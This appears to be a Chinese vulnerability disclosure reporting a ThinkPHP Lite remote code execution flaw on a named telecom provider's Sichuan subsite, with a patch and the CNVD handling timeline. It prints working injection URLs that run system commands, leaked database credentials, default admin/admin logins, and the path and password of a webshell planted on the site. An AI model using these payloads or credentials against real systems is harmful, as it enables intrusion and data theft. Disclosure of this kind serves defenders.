2014-05-02:细节已通知厂商并且等待厂商处理中
2014-05-07:厂商已经确认,细节仅向厂商公开
2014-05-17:细节向核心白帽子及相关领域专家公开
2014-05-27:细节向普通白帽子公开
2014-06-06:细节向实习白帽子公开
2014-06-16:细节向公众公开
WO门户四川省分站代码执行漏洞导致执行任何指令可以上传shell
详细说明:Thinkphp Lite 代码执行漏洞所导致可以执行任何指令.已经被人入侵放上shell了,貌似还没挂马.
例如:
查看phpinfo信息
http://sc.wo.com.cn/Index/index.php/module/aciton/param1/$%7B@phpinfo()%7D
查看当期目录
http://sc.wo.com.cn/Index/index.php/module/action/param1/%7B$%7Bsystem($_GET['x'])%7D%7D?x=ls%20-al
查看IP信息
http://sc.wo.com.cn/Index/index.php/module/action/param1/%7B$%7Bsystem($_GET['x'])%7D%7D?x=ifconfig
是内网机器,还是vm的虚拟机还算安全,普通用户运行apache还算有安全意识.
数据库密码一堆全暴露了.因为有50.50自动rsync同步web目录,所以webshell很快就被覆盖掉.
/usr/bin/rsync -azvr --progress --delete --password-file=/etc/rsync.ps delochi_rsync@192.168.50.50::backup /home/wwwroot/htdocs/
'DB_HOST'=>'192.168.50.31,192.168.50.32,192.168.50.33',
//'DB_NAME'=>'uni_cms',
'DB_NAME'=>'mini',
'DB_USER'=>'miniuser',
'DB_PWD'=>'mini#!#@##',
'DB_PORT'=>'3306',
'DB_PREFIX'=>'mu_',
'DB_CHARSET'=>'gbk',
'DB_RW_SEPARATE'=>true, //读写分离在读写分离的情况下,第一个数据库配置是主服务器的配置信息,负责写入数据,其它的都是从数据库的配置信息,负责读取数据,数量不限制。每次连接从服务器并且进行读取操作的时候,系统会随机进行在从服务器中选择。
'DB_DEPLOY_TYPE' => 1, //开始主从服务mysql
弱口令:
http://sc.wo.com.cn/yysd/admin.php
admin/admin
http://sc.wo.com.cn/qidian/Admin
admin/admin
已经有前辈上传了webshell,可以直接查看系统任何信息和数据库:
http://sc.wo.com.cn/include/dede.inc.php
密码为1qa
详细可见下图
应用目录
服务器IP
用户ID
数据库里的某管理员
后台登陆.
升级程序,官方已经发布补丁:https://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838或者直接修改源码:/trunk/ThinkPHP/Lib/Core/Dispatcher.class.php125行:$res = preg_replace(\'@(w+)\'.$depr.\'([^\'.$depr.\'\\/]+)@e\', \'$var[\\\'\\\\1\\\']="\\\\2";\', implode($depr,$paths));修改为$res = preg_replace(\'@(w+)\'.$depr.\'([^\'.$depr.\'\\/]+)@e\', \'$var[\\\'\\\\1\\\']=\\\'\\\\2\\\';\', implode($depr,$paths));将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。
危害等级:中
漏洞Rank:10
确认时间:2014-05-07 11:58
厂商回复:CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由四川分中心协调当地基础电信企业处置。
最新状态:暂无